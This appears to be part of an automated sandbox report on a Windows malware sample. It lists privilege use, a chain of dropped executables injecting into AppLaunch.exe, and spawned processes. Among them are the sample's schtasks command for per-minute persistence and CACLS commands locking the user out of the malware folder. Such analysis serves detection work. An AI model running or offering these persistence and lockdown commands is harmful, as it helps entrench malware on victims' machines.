Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9675.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
PID 3232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe

"C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1092 -ip 1092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 204

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\26CD.tmp\26CE.tmp\26CF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

